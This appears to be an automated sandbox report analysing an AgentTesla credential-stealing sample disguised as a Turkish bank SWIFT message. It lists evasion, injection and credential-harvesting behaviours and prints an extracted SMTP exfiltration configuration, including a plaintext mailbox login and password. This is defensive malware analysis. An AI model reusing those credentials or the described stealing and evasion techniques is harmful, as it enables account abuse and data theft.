Loading ...

Play interactive tourEdit tour

Windows Analysis Report Ziraat Bankasi Swift Mesaji.exe

Overview

General Information

Sample Name:Ziraat Bankasi Swift Mesaji.exe
Analysis ID:553163
MD5:161523651320083122d05dd374c87ec4
SHA1:df8fae3ff1125841de5aa2306de3501e8204919a
SHA256:f4d91c834da24d653fef9049355102bcb68be411280268af61ac8f59bce581db
Tags:AgentTeslaexegeoTURZiraatBank
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Detected unpacking (creates a PE file in dynamic memory)
Tries to steal Mail credentials (via file / registry access)
Tries to harvest and steal ftp login credentials
Machine Learning detection for sample
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Uses SMTP (mail sending)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "fizikokimya@antimikrop.com.tr", "Password": "fiziko2016Kimya", "Host": "mail.antimikrop.com.tr"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.554087278.00000000037F1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000003.00000002.554087278.00000000037F1000.00000004.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000003.00000002.551571985.0000000000508000.00000004.00000020.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000003.00000002.551571985.0000000000508000.00000004.00000020.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000003.00000000.292334595.0000000000414000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 18 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.Ziraat Bankasi Swift Mesaji.exe.37f3258.3.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              3.2.Ziraat Bankasi Swift Mesaji.exe.37f3258.3.raw.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                3.1.Ziraat Bankasi Swift Mesaji.exe.415058.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  3.1.Ziraat Bankasi Swift Mesaji.exe.415058.1.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    3.2.Ziraat Bankasi Swift Mesaji.exe.415058.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 55 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 3.1.Ziraat Bankasi Swift Mesaji.exe.415058.1.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "fizikokimya@antimikrop.com.tr", "Password": "fiziko2016Kimya", "Host": "mail.antimikrop.com.tr"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: Ziraat Bankasi Swift Mesaji.exeReversingLabs: Detection: 23%
                      Machine Learning detection for sampleShow sources
                      Source: Ziraat Bankasi Swift Mesaji.exeJoe Sandbox ML: detected
                      Source: 3.0.Ziraat Bankasi Swift Mesaji.exe.400000.6.unpackAvira: Label: TR/Spy.Gen8
                      Source: 3.1.Ziraat Bankasi Swift Mesaji.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: 3.2.Ziraat Bankasi Swift Mesaji.exe.400000.1.unpackAvira: Label: TR/Spy.Gen8
                      Source: 3.0.Ziraat Bankasi Swift Mesaji.exe.400000.4.unpackAvira: Label: TR/Spy.Gen8
                      Source: 3.0.Ziraat Bankasi Swift Mesaji.exe.400000.5.unpackAvira: Label: TR/Spy.Gen8
                      Source: 3.0.Ziraat Bankasi Swift Mesaji.exe.400000.1.unpackAvira: Label: TR/Spy.Gen8
                      Source: 3.0.Ziraat Bankasi Swift Mesaji.exe.400000.2.unpackAvira: Label: TR/Spy.Gen8
                      Source: 3.0.Ziraat Bankasi Swift Mesaji.exe.400000.3.unpackAvira: Label: TR/Spy.Gen8
                      Source: 3.0.Ziraat Bankasi Swift Mesaji.exe.400000.8.unpackAvira: Label: TR/Spy.Gen8
                      Source: 3.2.Ziraat Bankasi Swift Mesaji.exe.4970000.5.unpackAvira: Label: TR/Spy.Gen8

                      Compliance:

                      barindex
                      Detected unpacking (creates a PE file in dynamic memory)Show sources
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeUnpacked PE file: 3.2.Ziraat Bankasi Swift Mesaji.exe.4970000.5.unpack
                      Source: Ziraat Bankasi Swift Mesaji.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
                      Source: Binary string: wntdll.pdbUGP source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000003.292591572.0000000003270000.00000004.00000001.sdmp, Ziraat Bankasi Swift Mesaji.exe, 00000000.00000003.284056753.00000000030E0000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000003.292591572.0000000003270000.00000004.00000001.sdmp, Ziraat Bankasi Swift Mesaji.exe, 00000000.00000003.284056753.00000000030E0000.00000004.00000001.sdmp
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_00405D7C FindFirstFileA,FindClose,0_2_00405D7C
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_004053AA
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_00402630 FindFirstFileA,0_2_00402630
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 3_2_00404A29 FindFirstFileExW,3_2_00404A29
                      Source: global trafficTCP traffic: 192.168.2.7:49729 -> 77.88.21.37:587
                      Source: global trafficTCP traffic: 192.168.2.7:49729 -> 77.88.21.37:587
                      Source: Ziraat Bankasi Swift Mesaji.exe, 00000003.00000002.552826458.00000000027F1000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: Ziraat Bankasi Swift Mesaji.exe, 00000003.00000002.552826458.00000000027F1000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: Ziraat Bankasi Swift Mesaji.exe, 00000003.00000002.552826458.00000000027F1000.00000004.00000001.sdmpString found in binary or memory: http://lRguGt.com
                      Source: Ziraat Bankasi Swift Mesaji.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
                      Source: Ziraat Bankasi Swift Mesaji.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                      Source: Ziraat Bankasi Swift Mesaji.exe, 00000003.00000002.553520842.00000000029D0000.00000004.00000001.sdmpString found in binary or memory: https://Wm2Dt2zcSt3c655v3va.com
                      Source: Ziraat Bankasi Swift Mesaji.exe, 00000003.00000002.552826458.00000000027F1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%(
                      Source: Ziraat Bankasi Swift Mesaji.exe, 00000003.00000002.552826458.00000000027F1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: Ziraat Bankasi Swift Mesaji.exe, Ziraat Bankasi Swift Mesaji.exe, 00000003.00000002.554087278.00000000037F1000.00000004.00000001.sdmp, Ziraat Bankasi Swift Mesaji.exe, 00000003.00000000.292334595.0000000000414000.00000040.00000001.sdmp, Ziraat Bankasi Swift Mesaji.exe, 00000003.00000002.554248422.0000000004930000.00000004.00020000.sdmp, Ziraat Bankasi Swift Mesaji.exe, 00000003.00000001.292756258.0000000000400000.00000040.00020000.sdmp, Ziraat Bankasi Swift Mesaji.exe, 00000003.00000002.554299855.0000000004972000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: Ziraat Bankasi Swift Mesaji.exe, 00000003.00000002.552826458.00000000027F1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownDNS traffic detected: queries for: mail.antimikrop.com.tr
                      Source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.293572777.000000000074A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_00404F61 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404F61

                      System Summary:

                      barindex
                      .NET source code contains very large array initializationsShow sources
                      Source: 3.2.Ziraat Bankasi Swift Mesaji.exe.4970000.5.unpack, u003cPrivateImplementationDetailsu003eu007b1374F29Cu002d8C84u002d421Cu002d89E5u002d3799DC6DC7BBu007d/u00389DEAE1Fu002dF3ECu002d4475u002dA0CFu002d11ACB2FDF936.csLarge array initialization: .cctor: array initializer size 11991
                      Source: Ziraat Bankasi Swift Mesaji.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_00403225 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_00403225
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_0040604C0_2_0040604C
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_004047720_2_00404772
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 3_2_0040A2A53_2_0040A2A5
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 3_2_008224903_2_00822490
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 3_2_008218083_2_00821808
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 3_2_00821C483_2_00821C48
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 3_2_008200703_2_00820070
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 3_2_00820BA83_2_00820BA8
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 3_2_008200143_2_00820014
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 3_2_008C56883_2_008C5688
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 3_2_008C9CE03_2_008C9CE0
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 3_2_008CD4383_2_008CD438
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 3_2_008C00703_2_008C0070
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 3_2_008CF1703_2_008CF170
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 3_2_008C00113_2_008C0011
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 3_2_049D0A903_2_049D0A90
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 3_2_049DC8E83_2_049DC8E8
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 3_2_049DD3103_2_049DD310
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 3_2_049DBB383_2_049DBB38
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 3_2_049DD2F53_2_049DD2F5
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 3_2_00A8B136 NtQuerySystemInformation,3_2_00A8B136
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 3_2_00A8B105 NtQuerySystemInformation,3_2_00A8B105
                      Source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000003.285119056.00000000031F6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Ziraat Bankasi Swift Mesaji.exe
                      Source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000003.285489107.000000000338F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Ziraat Bankasi Swift Mesaji.exe
                      Source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000002.294724890.0000000003090000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamepvCVvHYPqsReUXauAjcxcqbGhkyQCsxTXEGkQdn.exe4 vs Ziraat Bankasi Swift Mesaji.exe
                      Source: Ziraat Bankasi Swift Mesaji.exeBinary or memory string: OriginalFilename vs Ziraat Bankasi Swift Mesaji.exe
                      Source: Ziraat Bankasi Swift Mesaji.exe, 00000003.00000002.554087278.00000000037F1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamepvCVvHYPqsReUXauAjcxcqbGhkyQCsxTXEGkQdn.exe4 vs Ziraat Bankasi Swift Mesaji.exe
                      Source: Ziraat Bankasi Swift Mesaji.exe, 00000003.00000000.292334595.0000000000414000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamepvCVvHYPqsReUXauAjcxcqbGhkyQCsxTXEGkQdn.exe4 vs Ziraat Bankasi Swift Mesaji.exe
                      Source: Ziraat Bankasi Swift Mesaji.exe, 00000003.00000002.554248422.0000000004930000.00000004.00020000.sdmpBinary or memory string: OriginalFilenamepvCVvHYPqsReUXauAjcxcqbGhkyQCsxTXEGkQdn.exe4 vs Ziraat Bankasi Swift Mesaji.exe
                      Source: Ziraat Bankasi Swift Mesaji.exe, 00000003.00000001.292756258.0000000000400000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamepvCVvHYPqsReUXauAjcxcqbGhkyQCsxTXEGkQdn.exe4 vs Ziraat Bankasi Swift Mesaji.exe
                      Source: Ziraat Bankasi Swift Mesaji.exe, 00000003.00000002.554299855.0000000004972000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamepvCVvHYPqsReUXauAjcxcqbGhkyQCsxTXEGkQdn.exe4 vs Ziraat Bankasi Swift Mesaji.exe
                      Source: Ziraat Bankasi Swift Mesaji.exeReversingLabs: Detection: 23%
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeFile read: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeJump to behavior
                      Source: Ziraat Bankasi Swift Mesaji.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe"
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess created: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe"
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess created: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe" Jump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 3_2_00A8AFBA AdjustTokenPrivileges,3_2_00A8AFBA
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 3_2_00A8AF83 AdjustTokenPrivileges,3_2_00A8AF83
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsdADF5.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/4@9/1
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar,0_2_00402012
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404275
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 3_2_00401489 GetModuleHandleW,GetModuleHandleW,FindResourceW,GetModuleHandleW,LoadResource,LockResource,GetModuleHandleW,SizeofResource,FreeResource,ExitProcess,3_2_00401489
                      Source: 3.2.Ziraat Bankasi Swift Mesaji.exe.4970000.5.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 3.2.Ziraat Bankasi Swift Mesaji.exe.4970000.5.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
                      Source: Binary string: wntdll.pdbUGP source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000003.292591572.0000000003270000.00000004.00000001.sdmp, Ziraat Bankasi Swift Mesaji.exe, 00000000.00000003.284056753.00000000030E0000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: Ziraat Bankasi Swift Mesaji.exe, 00000000.00000003.292591572.0000000003270000.00000004.00000001.sdmp, Ziraat Bankasi Swift Mesaji.exe, 00000000.00000003.284056753.00000000030E0000.00000004.00000001.sdmp

                      Data Obfuscation:

                      barindex
                      Detected unpacking (creates a PE file in dynamic memory)Show sources
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeUnpacked PE file: 3.2.Ziraat Bankasi Swift Mesaji.exe.4970000.5.unpack
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_72C51000 push eax; ret 0_2_72C5102E
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 3_2_00401F16 push ecx; ret 3_2_00401F29
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeCode function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405DA3
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeFile created: C:\Users\user\AppData\Local\Temp\nsyAE26.tmp\tkqqg.dllJump to dropped file
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
